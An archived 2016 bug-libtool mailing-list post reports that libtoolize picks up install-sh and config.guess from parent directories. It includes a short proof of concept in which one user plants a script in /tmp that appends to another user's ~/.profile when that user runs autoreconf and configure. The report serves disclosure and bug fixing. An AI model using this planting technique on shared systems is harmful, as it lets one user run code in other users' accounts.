bug#21951: [security] libtoolize behavior depends on parent directories

bug-libtool

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

bug#21951: [security] libtoolize behavior depends on parent directories

From:	Vincent Lefevre
Subject:	bug#21951: [security] libtoolize behavior depends on parent directories
Date:	Sat, 6 Aug 2016 19:09:45 +0200
User-agent:	Mutt/1.6.2-6749-vl-r90618 (2016-08-02)

Could this bug be eventually fixed?

One can compromise other users' account for those who run things
from /tmp subdirectories, e.g.

User1:
  echo "echo Hacked >> ~/.profile" > /tmp/install-sh
  chmod 755 /tmp/install-sh
  cp /tmp/install-sh /tmp/config.guess

User2:
* Have some libtool-based source in /tmp/some_dir
* From this directory, run:
  autoreconf -i
  ./configure

The consequence is that User2 has "Hacked" written at the end of
his .profile file. Of course, one can do much worse...

-- 
Vincent Lefèvre <address@hidden> - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

[Prev in Thread]

Current Thread

[Next in Thread]

bug#21951: [security] libtoolize behavior depends on parent directories, Vincent Lefevre <=

Next by Date: bug#24183: `join' problem on illumos
Next by thread: bug#24183: `join' problem on illumos
Index(es):
- Date
- Thread